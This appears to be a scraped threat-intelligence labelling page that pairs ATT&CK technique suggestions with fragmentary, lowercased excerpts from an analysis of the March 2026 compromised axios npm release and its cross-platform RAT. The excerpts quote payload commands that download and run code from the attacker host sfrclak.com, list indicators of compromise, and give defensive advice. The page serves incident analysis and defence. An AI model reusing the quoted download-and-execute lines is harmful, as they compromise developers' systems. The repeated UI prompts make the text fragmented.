Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
97%
"is identical to 1. 14. 0. the only meaningful change to package. json was a new dependency : " plain - crypto - js " : " ^ 4. 2. 1 ", a name meant to resemble the legitimate crypto - js, never imported by any axios code. we have not independently analyzed 0. 30. 4, but stepsecuri…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
97%
"] no such file or directory the attacker imported pwd ( which provides pwd. getpwuid ( os. getuid ( ) ). pw _ name, a portable alternative ) but never used it. a second bug affects the binary execution handler ( peinject ). the function do _ action _ ijt ( ) references an undefin…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
97%
"compromised axios npm package delivers cross - platform rat key points and observations - on march 31, 2026, an attacker hijacked an axios npm maintainer account and published two malicious releases : axios @ 1. 14. 1 andaxios @ 0. 30. 4. - these malicious releases add a trojaniz…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
96%
"- s3 → @ aws - sdk / signature - v4 - crt → aws - crt → axios. because aws - crt declares axios @ " ^ 1. 12. 2 ", running npm install during the compromise window would have resolved to the malicious 1. 14. 1. review ci / cd jobs that ran during the compromise window ci / cd pipe…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
96%
"a. ps1 payload from the c2 and executes it in hidden mode with execution policy bypass : curl - o % temp % \ 6202033. ps1 - d packages. npm. org / product1 - s http : / / sfrclak. com : 8000 / 6202033 % programdata % \ wt. exe - w hidden - ep bypass - file % temp % \ 6202033. ps1…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
95%
"problem : - at 01 : 38 utc, digitalbrainjs opened pr # 10591 to add a deprecation workflow for the compromised versions. digitalbrainjs flagged the issue deletions to the community. digitalbrainjs contacted npm directly and got all compromised versions and tokens revoked within a…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
94%
"/ /... other maintainers unchanged ] note : npm has since removed 1. 14. 1 from the registry and reverted dist - tags. latest to 1. 14. 0. the per - version metadata for 1. 14. 1 is no longer available through the public api, but the time object still records its publication time…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.002Compromise Software Supply Chain
94%
"publish the malicious versions. the technique matches a pattern documented by google in campaigns targeting open source maintainers : - the attacker reached out impersonating the founder of a company, using the real founder ' s likeness and branding. - they invited the maintainer…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
91%
". - most package managers now support a dependency cooldown setting that skips newly published versions, giving the community time to flag compromised releases before they reach your builds. jump to recommendations. note on datadog ' s exposure : several components that datadog m…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
84%
"- end 2026 - 03 - 31t03 : 25 : 00z protecting against similar attacks the compromised packages have been removed, but npm supply chain attacks are growing more frequent. the following measures can reduce your exposure to similar incidents. implement dependency cooldown when popul…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1587Develop Capabilities
77%
"compromised axios npm package delivers cross - platform rat key points and observations - on march 31, 2026, an attacker hijacked an axios npm maintainer account and published two malicious releases : axios @ 1. 14. 1 andaxios @ 0. 30. 4. - these malicious releases add a trojaniz…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
74%
"section lists network indicators, file paths, and payload hashes that can help you identify compromised machines or ci pipelines. query these iocs against any available telemetry data ( edr platforms, firewall logs, observability data ) to surface potentially compromised systems.…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1027Obfuscated Files or Information
70%
"a package. since axios @ 1. 14. 1 lists plain - crypto - js as a dependency, npm install axios triggers the chain : npm installs plain - crypto - js, then runs setup. js. the package also ships a second file, package. md, which is a copy of package. json without the postinstall e…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
64%
"##y ) : same c2 commands, same system enumeration, same post parameters. it can also retrieve and execute applescript payloads via osascript, stored under / tmp /. xxxxxx. scpt. build artifacts leak the attacker ' s development path ( / users / mac / desktop / jain _ dev / client…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1105Ingress Tool Transfer
50%
"t refreshed yet. hunt for follow - on activity by analyzing c2 traffic and file system artifacts across logs and workload telemetry data : @ dns. question. name : sfrclak. com @ network. destination. ip : 142. 11. 206. 73 @ network. destination. port : 8000 @ file. path : ( * com…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1587Develop Capabilities
49%
"is identical to 1. 14. 0. the only meaningful change to package. json was a new dependency : " plain - crypto - js " : " ^ 4. 2. 1 ", a name meant to resemble the legitimate crypto - js, never imported by any axios code. we have not independently analyzed 0. 30. 4, but stepsecuri…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.002Compromise Software Supply Chain
49%
"problem : - at 01 : 38 utc, digitalbrainjs opened pr # 10591 to add a deprecation workflow for the compromised versions. digitalbrainjs flagged the issue deletions to the community. digitalbrainjs contacted npm directly and got all compromised versions and tokens revoked within a…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.007JavaScript
48%
"a platform - specific rat on macos, windows, and linux, then removes all traces of the hook from disk. how plain - crypto - js delivers the payload plain - crypto - js @ 4. 2. 1 is a clone of the real crypto - js @ 4. 2. 0 with a scripts block added to its package. json : - " nam…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1564.004NTFS File Attributes
45%
"/ product0 " & " - s " & s & " & & chmod 770 " & d & " & & / bin / zsh - c \ \ " " & d & " " & s & " & \ \ " & > / dev / null " end try do shell script " rm - rf local _ path " ` ; script = script. replaceall ( a, q ) ; script = script. replaceall ( e, r ) ; fs. writefilesync ( r…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1204.002Malicious File
41%
"and executes a binary disguised as an apple system daemon : # deobfuscated applescript content curl - o / library / caches / com. apple. act. mond \ - d packages. npm. org / product0 \ - s http : / / sfrclak. com : 8000 / 6202033 chmod 770 / library / caches / com. apple. act. mo…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1204.005Malicious Library
40%
"compromised axios npm package delivers cross - platform rat key points and observations - on march 31, 2026, an attacker hijacked an axios npm maintainer account and published two malicious releases : axios @ 1. 14. 1 andaxios @ 0. 30. 4. - these malicious releases add a trojaniz…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
39%
"potential indicators of compromise analyze your package. json for the presence of axios check whether your package. json includes axios, and whether the version constraint could have resolved to a malicious version. $ cat package. json | grep axios " axios " : " ^ 1. 13. 0 " the …"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
37%
"and executes a binary disguised as an apple system daemon : # deobfuscated applescript content curl - o / library / caches / com. apple. act. mond \ - d packages. npm. org / product0 \ - s http : / / sfrclak. com : 8000 / 6202033 chmod 770 / library / caches / com. apple. act. mo…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
An attacker hijacked an axios maintainer's npm account to publish malicious releases that deliver a cross-platform RAT.